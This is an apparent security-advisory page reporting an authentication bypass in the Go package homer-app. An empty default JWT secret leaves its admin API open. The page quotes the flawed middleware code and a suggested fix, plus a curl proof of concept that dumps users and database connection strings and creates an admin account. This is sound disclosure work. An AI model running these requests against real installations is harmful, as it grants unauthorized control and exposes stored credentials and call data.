go package report

Is github.com/sipcapture/homer-app safe?

3 known vulnerabilities, worst severity CRITICAL.

// reach

0 direct dependencies

none carry a known advisory

    0 packages depend on it

    an advisory here reaches each of them

      Create a free accountfor every dependency path, dependent and what to upgrade
      // ai model usage

      Tracked for PyPI packages. HuggingFace models declare Python dependencies, so go packages are not covered.


      cvss
      0.0
      critical

      severity band, no base score published

      epss
      not scored

      chance of exploitation in 30 days

      xyz score
      not scored

      CyberXYZ composite out of 10

      fig. 01 — GHSA-rqcc-94gv-wjm9, the advisory selected below

      // 3 advisories

      GHSA-rqcc-94gv-wjm9

      CRITICALCVE-2026-62253
      // summary

      Both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated.

      // details

      coordinator/handlers/auth.go lines 298-304:

      func (h *Auth) JWTMiddleware() echo.MiddlewareFunc {
          return func(next echo.HandlerFunc) echo.HandlerFunc {
              return func(c echo.Context) error {
                  if h.jwtSecret == "" {
                      return next(c)  // bypass — no validation performed
                  }

      coordinator/handlers/authv4helpers.go lines 177-182:

      func (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc {
          return func(next echo.HandlerFunc) echo.HandlerFunc {
              return func(c echo.Context) error {
                  if h.jwtSecret == "" {
                      return next(c)  // same bypass

      coordinator/coordinator.go lines 315-317:

      if c.config.JWT.Secret != "" {
          protected.Use(authHandler.JWTMiddleware())  // middleware not even registered when secret is empty
      }

      config/config.go line 845: Secret field struct tag has default:"". The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.

      // poc
      # On a default Homer installation (no JWT secret configured), all protected routes are open:
      curl http:///api/v3/users
      # Returns full user list with no credentials
      
      curl http:///api/v3/databases
      # Returns all database connection strings
      
      curl -X POST http:///api/v3/users \
        -H 'Content-Type: application/json' \
        -d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}'
      # Creates a new admin user with no credentials
      // impact

      Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.

      // fix

      Fail closed: if JWT.Secret is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions:

      if h.jwtSecret == "" {
          log.Fatal("coordinator.jwt.secret must be set to a non-empty value")
      }

      If possible, please apply for a CVE number when posting.


      Checked 2026-10-07 at 18:28 UTC. The most recent advisory here was published 2026-10-07. Updated continuously from NVD, GHSA, OSV and CNA feeds.

      Think a verdict here is wrong? Tell us — we respond within 2 business days.